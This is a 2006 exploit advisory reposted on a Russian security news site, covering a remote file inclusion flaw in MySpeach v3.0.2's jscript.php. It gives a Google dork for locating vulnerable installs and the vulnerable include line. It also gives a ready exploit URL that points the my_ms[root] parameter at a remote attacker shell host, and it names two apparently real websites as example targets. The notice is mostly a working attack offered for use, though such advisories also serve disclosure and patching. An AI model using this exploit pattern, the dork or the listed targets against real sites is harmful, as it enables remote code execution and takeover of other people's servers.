Computer Security

Security Advisory: MySpeach <= v3.0.2 (my_ms[root]) Remote File Inclusion Exploit
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Akarru v0.4.3.34 - Remote File Include Vulnerabilities

  Shadow Prémod <= 2.7.1 [phpbb_root_path] Remote File Include Vulnerability

  BinGo News <= v3.01 (bnrep) Remote File Inclusion Exploit

  [SA21779] Drupal Pathauto Module Cross-Site Scripting Vulnerability

From:SHiKaA-_(at)_hotmail.com <SHiKaA-_(at)_hotmail.com>
Date:05.09.2006
Subject:MySpeach <= v3.0.2 (my_ms[root]) Remote File Inclusion Exploit

#================================================================================
==============
#MySpeach <= v3.0.2 (my_ms[root]) Remote File Inclusion Exploit
#================================================================================
===============
#                                                                        
#Critical Level : Very Dangerous                                              
#                                                                        
#Venedor site : http://www.graphiks.net/telecharger/scripts/myspeach.zip        
#                                                                        
#Version : v3.0.2 & All Versions Bellow                                              
#                                                          
#================================================================================
================
#
#Dork : allinurl: /myspeach/
#
#================================================================================
================
#Bug in : jscript.php
#
#Vlu Code :
#--------------------------------
#     include($my_ms["root"].'/error.php');
#  
#
#================================================================================
================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/jscript.php?my_ms[root]=http://SHELLURL.COM?
#
#Example :
#       http://www.seroweb.org/myspeach/
#       http://www.tribedusud.com/chat/myspeach
#
#================================================================================
================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior
=================================================================================
=================

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server